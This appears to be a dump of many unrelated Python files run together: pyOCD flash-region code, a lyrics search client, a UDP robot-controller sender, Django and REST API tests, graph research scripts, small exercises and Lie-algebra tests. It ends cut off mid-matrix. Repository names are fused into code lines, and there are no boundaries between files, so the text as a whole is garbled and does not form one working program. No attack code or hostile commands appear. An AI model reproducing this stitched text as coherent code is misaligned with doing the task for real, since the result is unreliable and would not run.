elem.attrib.get('alias', None), } # Create the memory region and add to map. region = MEMORY_TYPE_CLASS_MAP[type](**attrs) self._regions.append(region) # Record the first default ram for use in flash algos. if self._default_ram is None and type == MemoryType.RAM and isDefault: self._default_ram = region except (KeyError, ValueError) as err: # Ignore errors. 
LOG.debug("ignoring error parsing memories for CMSIS-Pack devices %s: %s", self.part_number, str(err)) def _get_containing_region(self, addr: int) -> Optional[MemoryRegion]: """@brief Return the memory region containing the given address.""" for region in self._regions: if region.contains_address(addr): return region return None def _build_flash_regions(self): """! @brief Converts ROM memory regions to flash regions. Each ROM region in the `_regions` attribute is converted to a flash region if a matching flash algo can be found. If the flash has multiple sector sizes, then separate flash regions will be created for each sector size range. The flash algo is converted to a pyOCD-compatible flash algo dict by calling _get_pyocd_flash_algo(). """ # Must have a default ram. if self._default_ram is None: LOG.warning("CMSIS-Pack device %s has no default RAM defined, cannot program flash" % self.part_number) return # Can't import at top level due to import loops. from ...core.session import Session regions_to_delete = [] # List of regions to delete. regions_to_add = [] # List of FlashRegion objects to add. # Create flash algo dicts once we have the full memory map. for i, region in enumerate(self._regions): # We're only interested in ROM regions here. if region.type != MemoryType.ROM: continue # Look for matching flash algo. algo_element = self._find_matching_algo(region) if algo_element is None: # Must be a mask ROM or non-programmable flash. continue # Load flash algo from .FLM file. packAlgo = self._load_flash_algo(algo_element.attrib['name']) if packAlgo is None: LOG.warning("Failed to convert ROM region to flash region because flash algorithm '%s' could not be " " found (%s)", algo_element.attrib['name'], self.part_number) continue # The ROM region will be replaced with one or more flash regions. regions_to_delete.append(region) # Log details of this flash algo if the debug option is enabled. current_session = Session.get_current() if current_session and current_session.options.get("debug.log_flm_info"): LOG.debug("Flash algo info: %s", packAlgo.flash_info) # Choose the page size. The check for <=32 is to handle some flash algos with incorrect # page sizes that are too small and probably represent the phrase size. page_size = packAlgo.page_size if page_size <= 32: page_size = min(s[1] for s in packAlgo.sector_sizes) # Select the RAM to use for the algo. try: # See if an explicit RAM range was specified for the algo. ram_start = int(algo_element.attrib['RAMstart'], base=0) # The region size comes either from the RAMsize attribute, the containing region's bounds, or # a large, arbitrary value. if 'RAMsize' in algo_element.attrib: ram_size = int(algo_element.attrib['RAMsize'], base=0) else: containing_region = self._get_containing_region(ram_start) if containing_region is not None: ram_size = containing_region.length - (ram_start - containing_region.start) else: # No size specified, and the RAMstart attribute is outside of a known region, # so just use a relatively large arbitrary size. Because the algo is packed at the # start of the provided region, this won't be a problem unless the DFP is # actually erroneous. ram_size = 128 * 1024 ram_for_algo = RamRegion(start=ram_start, length=ram_size) except KeyError: # No RAM addresses were given, so go with the RAM marked default. ram_for_algo = self._default_ram # Construct the pyOCD algo using the largest sector size. We can share the same # algo for all sector sizes. 
algo = packAlgo.get_pyocd_flash_algo(page_size, ram_for_algo) # Create a separate flash region for each sector size range. regions_to_add += list(self._split_flash_region_by_sector_size( region, page_size, algo, packAlgo)) # type: ignore # Now update the regions list. for region in regions_to_delete: self._regions.remove(region) for region in regions_to_add: self._regions.append(region) def _split_flash_region_by_sector_size(self, region: MemoryRegion, page_size: int, algo: Dict[str, Any], pack_algo: PackFlashAlgo) -> Iterator[FlashRegion]: """@brief Yield separate flash regions for each sector size range.""" # The sector_sizes attribute is a list of bi-tuples of (start-address, sector-size), sorted by start address. for j, (offset, sector_size) in enumerate(pack_algo.sector_sizes): start = region.start + offset # Determine the end address of the this sector range. For the last range, the end # is just the end of the entire region. Otherwise it's the start of the next # range - 1. if j + 1 >= len(pack_algo.sector_sizes): end = region.end else: end = region.start + pack_algo.sector_sizes[j + 1][0] - 1 # Skip wrong start and end addresses if end < start: continue # Limit page size. if page_size > sector_size: region_page_size = sector_size LOG.warning("Page size (%d) is larger than sector size (%d) for flash region %s; " "reducing page size to %d", page_size, sector_size, region.name, region_page_size) else: region_page_size = page_size # If we don't have a boot memory yet, pick the first flash. if not self._saw_startup: is_boot = True self._saw_startup = True else: is_boot = region.is_boot_memory # Construct region name. If there is more than one sector size, we need to make the region's name unique. region_name = region.name if len(pack_algo.sector_sizes) > 1: region_name += f"_{sector_size:#x}" # Construct the flash region. yield FlashRegion(name=region_name, access=region.access, start=start, end=end, sector_size=sector_size, page_size=region_page_size, flm=pack_algo, algo=algo, erased_byte_value=pack_algo.flash_info.value_empty, is_default=region.is_default, is_boot_memory=is_boot, is_testable=region.is_testable, alias=region.alias) def _find_matching_algo(self, region): """! @brief Searches for a flash algo covering the regions's address range.'""" for algo in self._info.algos: # Both start and size are required attributes. algoStart = int(algo.attrib['start'], base=0) algoSize = int(algo.attrib['size'], base=0) algoEnd = algoStart + algoSize - 1 # Check if the region indicated by start..size fits within the algo. if (algoStart <= region.start <= algoEnd) and (algoStart <= region.end <= algoEnd): return algo return None def _load_flash_algo(self, filename: str) -> Optional[PackFlashAlgo]: """! @brief Return the PackFlashAlgo instance for the given flash algo filename.""" if self.pack is not None: try: algo_data = self.pack.get_file(filename) return PackFlashAlgo(algo_data) except FileNotFoundError: pass # Return default value. return None @property def pack(self): """! @brief The CmsisPack object that defines this device.""" return self._pack @property def part_number(self): """! @brief Part number for this device. This value comes from either the `Dname` or `Dvariant` attribute, depending on whether the device was created from a `` or `` element. """ return self._part @property def vendor(self): """! @brief Vendor or manufacturer name.""" return self._info.families[0].split(':')[0] @property def families(self): """! 
@brief List of families the device belongs to, ordered most generic to least.""" return [f for f in self._info.families[1:]] @property def memory_map(self): """! @brief MemoryMap object.""" # Lazily construct the memory map. if self._memory_map is None: self._build_memory_regions() self._build_flash_regions() # Warn if there was no boot memory. if not self._saw_startup: LOG.warning("CMSIS-Pack device %s has no identifiable boot memory", self.part_number) self._memory_map = MemoryMap(self._regions) return self._memory_map @property def svd(self): """! @brief File-like object for the device's SVD file. @todo Support multiple cores. """ try: svdPath = self._info.debugs[0].attrib['svd'] return self._pack.get_file(svdPath) except (KeyError, IndexError): return None @property def default_reset_type(self): """! @brief One of the Target.ResetType enums. @todo Support multiple cores. """ try: resetSequence = self._info.debugs[0].attrib['defaultResetSequence'] if resetSequence == 'ResetHardware': return Target.ResetType.HW elif resetSequence == 'ResetSystem': return Target.ResetType.SW_SYSRESETREQ elif resetSequence == 'ResetProcessor': return Target.ResetType.SW_VECTRESET else: return Target.ResetType.SW except (KeyError, IndexError): return Target.ResetType.SW def __repr__(self): return "<%s@%x %s>" % (self.__class__.__name__, id(self), self.part_number) search.py from models.lyric import Lyric from typing import List, Optional from exceptions import NotFoundException from models.song import Song from template import ( ENDPOINT_URL, GET_RESEMBLE_XML_COUNT, GET_RESEMBLE_XML_COUNT_HEADER, GET_RESEMBLE_XML_LIST, GET_RESEMBLE_XML_LIST_HEADER, ) from utils import Utils class Searcher: def __init__(self) -> None: pass def search(self, title: str, artist: Optional[str] = None) -> List[Song]: """ Search lyrics with title & artist. Parameters ---------- title : str Title of the song to search for. artist : Optional[str] Artist of the song to search for. Returns ------- Lyrics Lyrics dataclass of the song searched. 
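Examples
--------
Illustrative only (hypothetical song; assumes the remote lyrics service is
reachable and returns at least one match)::

    searcher = Searcher()
    songs = searcher.search("Yesterday", artist="The Beatles")
    for song in songs:
        print(song.title, song.artist, song.lyric_id)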
""" count = self._get_resemble_count(title=title, artist=artist) if count == 0: raise NotFoundException("Can't find any lyric.") return self._get_resemble(title=title, artist=artist) def _get_resemble_count( self, title: str, artist: Optional[str] = None ) -> int: query = GET_RESEMBLE_XML_COUNT.format(title=title, artist=artist or "") soup = Utils.post( url=ENDPOINT_URL, data=query.encode(), headers=GET_RESEMBLE_XML_COUNT_HEADER, ) count: str = soup.find("strResembleLyricCount").text return int(count) def _get_resemble( self, title: str, artist: Optional[str] = None ) -> List[Song]: query = GET_RESEMBLE_XML_LIST.format( title=title, artist=artist or "", enc_data=Utils.create_enc() ) soup = Utils.post( url=ENDPOINT_URL, data=query.encode(), headers=GET_RESEMBLE_XML_LIST_HEADER, ) results = soup.find_all("ST_SEARCHLYRIC_LIST") return [ Song( title=x.find("title").text, artist=x.find("artist").text, lyric_id=x.find("lyricID").text, album=x.find("album").text, ) for x in results ] # s = Searcher() # s.search(" The Banshees")tshimba/udp_connection from argparse import ArgumentParser import pandas as pd import sys import os.path import numpy as np import binascii import socket import re def set_data_to_yac(dir_name, file_name): if 'csv' not in file_name: print("file is not csv") return file_path = os.path.join(dir_name, file_name) if not os.path.exists(file_path): print("file not exist") return print('load ', file_path) df = pd.read_csv(file_path, header=None) df_len = len(df.index) # 1 loop is 1 line for i, v in df.iterrows(): write (to_ascii(i, 2), to_ascii(v[0], 4), to_ascii(v[1], 4), to_ascii(v[2], 4), to_ascii(v[3], 4), to_ascii(v[4], 4), to_ascii(v[5], 4)) def to_ascii(dec, n_byte): hex_str = to_hex_le(dec, n_byte) li = [(i+j) for (i,j) in zip(hex_str[::2], hex_str[1::2])] ascii_code = '<' + '><'.join(li) + '>' return ascii_code ''' to hex little endian with two's complement ''' def to_hex_le(dec, n_byte): # numpy int to premitive int dec = np.asscalar(dec) if n_byte is 2: return dec.to_bytes(2, 'little', signed=True).hex().upper() elif n_byte is 4: return dec.to_bytes(4, 'little', signed=True).hex().upper() elif n_byte is 8: return dec.to_bytes(8, 'little', signed=True).hex().upper() else: return 'error' def write(i, x, y, z, r_x, r_y, r_z): #print(i, x, y, z, r_x, r_y, r_z) #SOURCE_ADDR = 'localhost' SOURCE_ADDR = '192.168.1.10' SOURCE_PORT = 10050 #DESTINATION_ADDR = 'localhost' DESTINATION_ADDR = '192.168.1.99' DESTINATION_PORT = 10040 # header yerc = "<59><45><52><43>" # fixed header_size = "<20><00>" # fixed data_size = "<34><00>" # dynamic (fixed: 52 byte for position) reserved1 = "<03><01><00><00>" # fixed blocked = "<00><00><00><00>" # fixed reserved2 = "<39><39><39><39><39><39><39><39>" # fixed header = yerc + header_size + data_size + reserved1 + blocked + reserved2 # sub header command = "<7F><00>" # dynamic data_index = i # dynamic: max: 99 request_num = "<00>" # dynamic (fixed: 1 for data type) compute = "<02>" # dynamic: Set_Attribute_All :0x02 padding = "<00><00>" sub_header = command + data_index + request_num + compute + padding # data data_type = "<11><00><00><00>" # fixed: 11 for robot coordinate form = "<00><00><00><00>" # fixed tool_num = "<00><00><00><00>" # fixed user_coor_num = "<00><00><00><00>" # fixed custom_form = "<00><00><00><00>" # fixed data_common_part = data_type + form + tool_num + user_coor_num + custom_form coor1 = x # dynamic coor2 = y # dynamic coor3 = z # dynamic coor4 = r_x # dynamic coor5 = r_y # dynamic coor6 = r_z # dynamic coor7 = 
"<00><00><00><00>" # fixed coor8 = "<00><00><00><00>" # fixed coors = coor1 + coor2 + coor3 + coor4 + coor5 + coor6 + coor7 + coor8 data = data_common_part + coors # request ascii_str = header + sub_header + data # ascii code to binary data = bytearray() matches = re.findall(r'[0-9A-Z]{2}', ascii_str.upper()) for match in matches: data += bytearray.fromhex(match) # send data client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP client.bind((SOURCE_ADDR, SOURCE_PORT)) client.sendto(data, (DESTINATION_ADDR, DESTINATION_PORT)) print('sent>> ', binascii.hexlify(data)) # answer recv_data, addr = client.recvfrom(4096) print('recv<< ', binascii.hexlify(recv_data)) def parser(): usage = 'Usage: python {} [-d DIRECTORY] [--help]'\ .format(__file__) argparser = ArgumentParser(usage=usage) argparser.add_argument('-d', '--directory', dest='dir_name', help='directory name') args = argparser.parse_args() return args.dir_name if __name__ == '__main__': DEFAULT_DIR = 'csv_files' dir_name = parser() print('directory name: ', dir_name) if dir_name is None: print('set default dir name', DEFAULT_DIR) dir_name = DEFAULT_DIR if not os.path.exists(dir_name): print('directory "', dir_name, '"not exist') sys.exit() files = os.listdir(dir_name) print(files) for file_name in files: set_data_to_yac(dir_name, file_name) # TODO: jobstart # TODO: wait uw-it-aca/sqlshare-rest from django.test import TestCase from unittest2 import skipIf from django.db import connection import json import re from sqlshare_rest.util.db import get_backend from sqlshare_rest.test import missing_url from django.test.utils import override_settings from django.test.client import Client from django.core.urlresolvers import reverse from sqlshare_rest.test.api.base import BaseAPITest from sqlshare_rest.dao.dataset import create_dataset_from_query from sqlshare_rest.util.db import is_mssql, is_mysql, is_sqlite3, is_pg import six if six.PY2: from StringIO import StringIO elif six.PY3: from io import StringIO @skipIf(missing_url("sqlshare_view_dataset_list"), "SQLShare REST URLs not configured") @override_settings(MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.RemoteUserMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ), SQLSHARE_QUERY_CACHE_DB="test_ss_query_db", AUTHENTICATION_BACKENDS = ('django.contrib.auth.backends.ModelBackend',) ) class DownloadAPITest(BaseAPITest): token = None query_id = None def test_download(self): owner = "test_dataset_download2" self.remove_users.append(owner) auth_headers = self.get_auth_header_for_username(owner) post_url = reverse("sqlshare_view_init_download") response = self.client.post(post_url, data=json.dumps({'sql': 'SELECT (1)', 'downloads': 1}), content_type="application/json", **auth_headers) self.assertEqual(response.status_code, 200) download_url = response["Location"] response2 = self.client.get(download_url, content_type='application/json') self.assertEqual(response2.status_code, 200) self.assertTrue(response2.streaming) response_body = StringIO("".join(map(lambda x: x.decode("utf-8-sig"), response2.streaming_content))).read() if is_mssql(): resp = '""\n"1"\n' elif is_mysql(): resp = '"1"\n"1"\n' elif is_pg(): resp = '"?column?"\n"1"\n' else: resp = '"(1)"\n"1"\n' self.assertEqual(response_body, resp) # Ensure download only works once response = 
self.client.get(download_url, content_type='application/json') self.assertEqual(response.status_code, 404) def test_bad_query(self): owner = "test_invalid_download_owner" other = "test_invalid_download_sneak" self.remove_users.append(owner) self.remove_users.append(other) get_backend().get_user(other) model = create_dataset_from_query(username=owner, dataset_name="test_download_2", sql="SELECT (3)") if is_mssql(): sql = "SELECT * FROM [test_invalid_download_owner].[test_download_2]" elif is_mysql(): sql = "SELECT * FROM `test_invalid_download_owner`.`test_download_2`"; else: sql = "SELECT * FROM test_download_2"; post_url = reverse("sqlshare_view_init_download") other_auth_headers = self.get_auth_header_for_username(other) # Now try just invalid sql response = self.client.post(post_url, data=json.dumps({'sql': "SELECT (1", 'downloads': 1}), content_type="application/json", **other_auth_headers) self.assertEqual(response.status_code, 200) download_url = response["Location"] response2 = self.client.get(download_url, content_type='application/json') self.assertEqual(response2.status_code, 200) if is_sqlite3(): # sqlite3 doesn't have permissions for the test below to fail on... return # Test a user w/ no access trying to download a dataset's content. response = self.client.post(post_url, data=json.dumps({'sql': sql, 'downloads': 1}), content_type="application/json", **other_auth_headers) self.assertEqual(response.status_code, 200) download_url = response["Location"] response2 = self.client.get(download_url, content_type='application/json') self.assertEqual(response2.status_code, 200) def test_bad_download(self): owner = "query_user1" self.remove_users.append(owner) # bad query id post_url = reverse("sqlshare_view_run_download", kwargs={'token': 'asd'}) auth_headers = self.get_auth_header_for_username(owner) response = self.client.get(post_url, content_type='application/json') self.assertEqual(response.status_code, 404) def test_bad_methods(self): owner = "query_user1" auth_headers = self.get_auth_header_for_username(owner) init_url = reverse("sqlshare_view_init_download") init_response = self.client.get(init_url, content_type='application/json', **auth_headers) self.assertEqual(init_response.status_code, 405) download_url = reverse("sqlshare_view_run_download", kwargs={ 'token' : 'asd1234'}) download_response = self.client.post(download_url, content_type='application/json') self.assertEqual(download_response.status_code, 405) # This is file of methods for paper "Towards Description of Block Model on Graph" accepted at ECML/PKDD 2020 # Authors: , , # Code implemented by: @ UC Davis # This code serve to reproduce the DTDM with cover or forget relaxation from paper "The Cluster Description Problem - Complexity Results, Formulations and Approximations" # authored by , , and , published at Advances in Neural Information Processing Systems 31 (NIPS 2018) from gurobipy import * import numpy as np import sys import descriptor_discover import edge_set_operations_smart import util_smart X = np.genfromtxt('StructuralAdjIUR.csv',delimiter=','); X[np.where(X>0)] = 1; X[np.where(X<1)] = 0; # Make the graph undirected if it is not. 
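# A toy version (illustrative 3-node data) of the symmetrize-and-binarize step performed by
# the next few statements on the loaded adjacency matrix:
import numpy as np
_A = np.array([[0, 1, 0],
               [0, 0, 2],
               [0, 0, 0]], dtype=float)
_A = _A + np.transpose(_A)   # add the reverse direction of every edge
_A[np.where(_A > 0)] = 1     # collapse weights/multi-edges to 0/1
np.fill_diagonal(_A, 0)      # drop self-loops, as the loop below does for X
assert (_A == np.transpose(_A)).all()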
X = X + np.transpose(X); X[np.where(X>0)] = 1; X[np.where(X<1)] = 0; [n,n1] = X.shape for i in range(n): X[i,i] = 0 L = np.genfromtxt('StructuralUserHashtagIUR.csv',delimiter=','); L[np.where(L>0)] = 1; L[np.where(L<1)] = 0; [n,T] = X.shape print("Number of tags:", T) ll = np.matmul(L,np.transpose(L)) ll[np.where(ll>0)] = 1; ll[np.where(ll<1)] = 0; Behavioral_Graph = X # Retweet/following graph Tags = L # We use hashtags as node tags/labels T = Tags.shape[1] #kmax = 7; repmax = 10; mydata = {} #initk = 2; initrep = 1; ktmp = 4; rep = 4; kstr = str(ktmp) repstr = str(rep) print("Find descriptions for the intra-block edge collections:") # Now, only consider different graphs or multiple graphs/subgraphs. No partial orthogonality concerned. Vls = []; C = []; # Cluster indicator indicating the graphs' membership to facilitate partial orthogonality F = np.genfromtxt(('nmtf_'+kstr+'_'+repstr+'_F.csv'),delimiter=',') for j in range(ktmp): Ltmp = Tags[np.where(F[:,j]>0)[0],:] llength = np.sum(Ltmp,axis=1) Ljtmp = Ltmp[np.where(llength>0)[0],:] Vls.append(Ljtmp); m = descriptor_discover.baseline_cof_v(Vls, ktmp, T); D, Dw, Db = util_smart.unpack_gurobi_model_descriptors_BM(m,ktmp,ktmp,T) mydata[kstr+'_'+repstr] = [D,m.runTime] np.savez('The_DTDM_cof_T880_V.npz',data=mydata) 0 # -*- coding: utf-8 -*- # # Copyright (C) 2019 CHAOSS # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see . # # Authors: # <> # import datetime import unittest import json from implementations.scripts.pullrequest_github import PullRequestGitHub def read_file(path): """ Given a line-by-line JSON file, this function converts it to a Python dictionary and returns all such lines as a list. :param path: the path to the JSON file :returns items: a list of dictionaries read from the JSON file """ items = list() with open(path, 'r') as raw_data: for line in raw_data: line = json.loads(line) items.append(line) return items class TestPullRequestGitHub(unittest.TestCase): """ Class to test the PullRequestGitHub class. """ def setUp(self): """ Run before each test to read the test data file """ self.items = read_file('data/test_pulls_data.json') def test__flatten_valid_input(self): """ Test for valid input. A pull request that satisfies all conditions passed while creating a PullRequestGitHub object for testing. A properly flattened pull request is expected. """ pullrequest = PullRequestGitHub(self.items) flat_item = pullrequest._flatten(self.items[0]) flat_expected = [ { 'repo': 'https://github.com/atom/language-java', 'hash': 13262348, 'category': 'pull_request', 'author': 'anson0370', 'created_date': datetime.datetime(2014, 3, 6, 0, 0), 'current_status': "closed", 'merged': True } ] self.assertEqual(flat_item, flat_expected) def test__flatten_invalid_input_since(self): """ Test for invalid input. An empty list is expected to be returned. 
""" # date in future, hence no pull request will satisfy date check date_since = datetime.datetime.strptime("2020-09-20", "%Y-%m-%d") pullrequest = PullRequestGitHub(self.items, date_range=(date_since, None)) flat_item = pullrequest._flatten(self.items[0]) flat_expected = [] self.assertEqual(flat_item, flat_expected) def test__flatten_invalid_input_until(self): """ Test for invalid input. An empty list is expected to be returned. """ # date in future, hence no pull request will satisfy date check date_until = datetime.datetime.strptime("1800-09-20", "%Y-%m-%d") pullrequest = PullRequestGitHub(self.items, date_range=(None, date_until)) flat_item = pullrequest._flatten(self.items[0]) flat_expected = [] self.assertEqual(flat_item, flat_expected) if __name__ == '__main__': unittest.main(verbosity=2) 0 #--- Exercicio 2 - Variávies e impressão com interpolacão de string #--- Crie um menu para um sistema de cadastro de funcionários #--- O menu deve ser impresso com a função format() para concatenar os números da opções, que devem ser números inteiros #--- Alem das opções o menu deve conter um cabeçalho e um rodapé #--- O cabeçalho e o rodapé devem ser impressos utilizando a multiplicação de caracters #--- Entre o cabeçalho e o menu e entre o menu e o rodapé deverá ter espaçamento de 3 linhas #--- Deve ser utilizado os caracteres especiais de quebra de linha e de tabulaçãotzxyz/leetcode0 from typing import List class Solution: """ 给定一个整数数组,判断是否存在重复元素。 如果任何值在数组中出现至少两次,函数返回 true。如果数组中每个元素都不相同,则返回 false。 示例 1: 输入: [1,2,3,1] 输出: true 示例 2: 输入: [1,2,3,4] 输出: false 示例 3: 输入: [1,1,1,3,3,4,3,2,4,2] 输出: true """ def containsDuplicate(self, nums: List[int]) -> bool: return len(nums) != len(set(nums)) def containsDuplicate2(self, nums: List[int]) -> bool: d = {} for n in nums: if n in d.keys(): return True else: d[n] = True return False if __name__ == '__main__': tests = [ ([1, 2, 3, 1], True), ([1, 2, 3, 4], False), ([1, 1, 1, 3, 3, 4, 3, 2, 4, 2], True) ] for nums, r in tests: assert Solution().containsDuplicate(nums) == r assert Solution().containsDuplicate2(nums) == r rookie/mysite/migrations/0005_testcase_vueusermodel.py1-10 # Generated by Django 2.2.17 on 2021-05-17 16:58 from django.db import migrations, models import django_mysql.models class Migration(migrations.Migration): dependencies = [ ('mysite', '0004_vuemodel'), ] operations = [ migrations.CreateModel( name='TestCase', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('case_name', models.CharField(max_length=50)), ('method', models.CharField(max_length=10)), ('base_url', models.CharField(max_length=500)), ('params', models.CharField(default='', max_length=500, null=True)), ('headers', django_mysql.models.JSONField(default=dict, null=True)), ('mine_type', models.CharField(max_length=5)), ('body', django_mysql.models.JSONField(default=dict, null=True)), ('response', django_mysql.models.JSONField(default=dict, null=True)), ], options={ 'verbose_name': '接口用例表', 'db_table': 'tbl_case_info', }, ), migrations.CreateModel( name='VueUserModel', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=50)), ('email', models.CharField(max_length=50)), ('phonenumber', models.IntegerField()), ('roletype', models.CharField(default='普通用户', max_length=20)), ], options={ 'verbose_name': 'user信息表', 'db_table': 'internal_user', }, ), ] 1-10 # -*- coding: utf-8 -*- # @Author: # @Date: 2016-04-11 22:58:12 # @Last 
Modified by: # @Last Modified time: 2016-04-11 22:58:18 from datetime import datetime if __name__ == "__main__": T = int(input()) pattern = '%a %d %b %Y %H:%M:%S %z' for _ in range(T): s = datetime.strptime(input(), pattern).timestamp() t = datetime.strptime(input(), pattern).timestamp() print(int(abs(s - t)))samiptimalsena/Guitar-Chord-Recognizer import sounddevice as sd import config import numpy as np from scipy.io.wavfile import write import matplotlib.pyplot as plt import librosa import librosa.display import torch import streamlit as st FRAME_SIZE = 2048 HOP_LENGTH = 512 N_MELS = 128 def record(): duration = 3 fs = 22050 recording = sd.rec(frames=(duration * fs), samplerate=fs, channels=2) sd.wait() write(config.RECORDING_WAV, fs, recording) np.save(config.RECORDING_NPY, recording) print('recording complete') def play(): fs = 22050 recording = np.load(config.RECORDING_NPY) sd.play(recording, fs) def create_tensor(): device = torch.device('cpu') audio, sr = librosa.load(config.RECORDING_WAV, offset=0.3, duration=1.5) melspectogram = librosa.feature.melspectrogram(audio, sr, n_fft=FRAME_SIZE, hop_length=HOP_LENGTH, n_mels=N_MELS) melspectogram = librosa.power_to_db(melspectogram) mel_tensor = torch.from_numpy(melspectogram).type(torch.FloatTensor) mel_tensor = mel_tensor.view(1,1,128,65) mel_tensor = mel_tensor.to(device) return mel_tensor def display_spectogram(): audio, sr = librosa.load(config.RECORDING_WAV, offset=0.3, duration=1.5) melspectogram = librosa.feature.melspectrogram(audio, sr, n_fft=FRAME_SIZE, hop_length=HOP_LENGTH, n_mels=N_MELS) melspectogram = librosa.power_to_db(melspectogram) plt.figure(figsize=(15, 8)) librosa.display.specshow(melspectogram, sr=sr, hop_length=HOP_LENGTH, x_axis='time', y_axis='log') plt.title('Mel-frequency spectrogram') plt.colorbar(format='%+2.0f') st.pyplot(plt)# Copyright 2014 Mirantis, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
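# Why the Guitar-Chord-Recognizer helpers above can hard-code a (1, 1, 128, 65) tensor shape,
# worked by hand (assumes librosa's default centered framing): a 1.5 s clip at sr=22050 has
# 33075 samples, a hop_length of 512 gives 1 + 33075 // 512 = 65 frames, and n_mels=128 fixes
# the other axis.
_duration_s, _sr, _hop_length, _n_mels = 1.5, 22050, 512, 128
_n_samples = int(_duration_s * _sr)            # 33075
_n_frames = 1 + _n_samples // _hop_length      # 65
assert (_n_mels, _n_frames) == (128, 65)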
import logging from fuel_agent_ci.objects.environment import Environment LOG = logging.getLogger(__name__) class Manager(object): def __init__(self, data): self.env = Environment.new(**data) def do_item(self, item_type, item_action, item_name=None, **kwargs): return getattr( self.env, '%s_%s' % (item_type, item_action))(item_name, **kwargs) def do_env(self, env_action, **kwargs): return getattr(self.env, env_action)(**kwargs) from liesym import F4, E, Basis from sympy import Matrix, Rational, S def test_F4(): F4_ = F4() # test subclass items assert F4_.dimension == 4 assert F4_.n_pos_roots == 24 assert F4_.simple_roots == [ Matrix([[1, -1, 0, 0]]), Matrix([[0, 1, -1, 0]]), Matrix([[0, 0, 1, 0]]), Matrix([[-S.Half, -S.Half, -S.Half, -S.Half]]), ] fw = F4_.fundamental_weights[0] assert fw.basis == Basis.ORTHO assert F4_.to_omega(fw) == Matrix([[1, 0, 0, 0]]) # baseclass generated assert F4_.cartan_matrix == Matrix( [[2, -1, 0, 0], [-1, 2, -2, 0], [0, -1, 2, -1], [0, 0, -1, 2]]) assert F4_.cocartan_matrix == Matrix( [[1, -1, 0, 0], [0, 1, -1, 0], [0, 0, 2, 0], [-1, -1, -1, -1]]) assert F4_.omega_matrix == Matrix( [[1, 0, 0, -1], [1, 1, 0, -2], [S.Half, S.Half, S.Half, -3*S.Half], [0, 0, 0, -1]]) assert F4_.metric_tensor == Matrix( [[2, 3, 2, 1], [3, 6, 4, 2], [2, 4, 3, 3*S.Half], [1, 2, 3*S.Half, 1]]) assert F4_.reflection_matricies == [ Matrix([ [0, 1, 0, 0], [1, 0, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]), Matrix([ [1, 0, 0, 0], [0, 0, 1, 0], [0, 1, 0, 0], [0, 0, 0, 1]]), Matrix([ [1, 0, 0, 0], [0, 1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]]), Matrix([ [S.Half, -S.Half, -S.Half, -S.Half], [-S.Half, S.Half, -S.Half, -S.Half], [-S.Half, -S.Half, S.Half, -S.Half], [-S.Half, -S.Half, -S.Half, S.Half]])] assert F4_.fundamental_weights == [Matrix([[1, 0, 0, -1]]), Matrix( [[1, 1, 0, -2]]), Matrix([[S.Half, S.Half, S.Half, -3*S.Half]]), Matrix([[0, 0, 0, -1]])] # backend assert [F4_.to_omega(x) for x in F4_.root_system()] == [ Matrix([[1, 0, 0, 0]]), Matrix([[-1, 1, 0, 0]]), Matrix([[0, -1, 2, 0]]), Matrix([[0, 0, 0, 1]]), Matrix([[0, 0, 1, -1]]), Matrix([[0, 1, -2, 2]]), Matrix([[0, 1, -1, 0]]), Matrix([[1, -1, 0, 2]]), Matrix([[-1, 0, 0, 2]]), Matrix([[0, 1, 0, -2]]), Matrix([[1, -1, 1, 0]]), Matrix([[-1, 0, 1, 0]]), Matrix([[1, -1, 2, -2]]), Matrix([[1, 0, -1, 1]]), Matrix([[-1, 0, 2, -2]]), Matrix([[-1, 1, -1, 1]]), Matrix([[1, 0, 0, -1]]), Matrix([[-1, 1, 0, -1]]), Matrix([[0, -1, 1, 1]]), Matrix([[1, 1, -2, 0]]), Matrix([[-1, 2, -2, 0]]), Matrix([[0, -1, 2, -1]]), Matrix([[0, 0, -1, 2]]), Matrix([[2, -1, 0, 0]]), Matrix([[0, 0, 0, 0]]), Matrix([[0, 0, 0, 0]]), Matrix([[0, 0, 0, 0]]), Matrix([[0, 0, 0, 0]]), Matrix([[-2, 1, 0, 0]]), Matrix([[0, 0, 1, -2]]), Matrix([[0, 1, -2, 1]]), Matrix([[1, -2, 2, 0]]), Matrix([[-1, -1, 2, 0]]), Matrix([[0, 1, -1, -1]]), Matrix([[1, -1, 0, 1]]), Matrix([[-1, 0, 0, 1]]), Matrix([[1, -1, 1, -1]]), Matrix([[1, 0, -2, 2]]), Matrix([[-1, 0, 1, -1]]), Matrix([[-1, 1, -2, 2]]), Matrix([[1, 0, -1, 0]]), Matrix([[-1, 1, -1, 0]]), Matrix([[0, -1, 0, 2]]), Matrix([[1, 0, 0, -2]]), Matrix([[-1, 1, 0, -2]]), Matrix([[0, -1, 1, 0]]), Matrix([[0, -1, 2, -2]]), Matrix([[0, 0, -1, 1]]), Matrix([[0, 0, 0, -1]]), Matrix([[0, 1, -2, 0]]), Matrix([[1, -1, 0, 0]]), Matrix([[-1, 0, 0, 0]]), ] def test_E6(): E6 = E(6) # test subclass items assert E6.dimension == 6 assert E6.n_pos_roots == 36 assert E6.simple_roots == [ Matrix([[S.Half, -S.Half, -S.Half, -S.Half, - S.Half, -S.Half, -S.Half, S.Half]]), Matrix([[-1, 1, 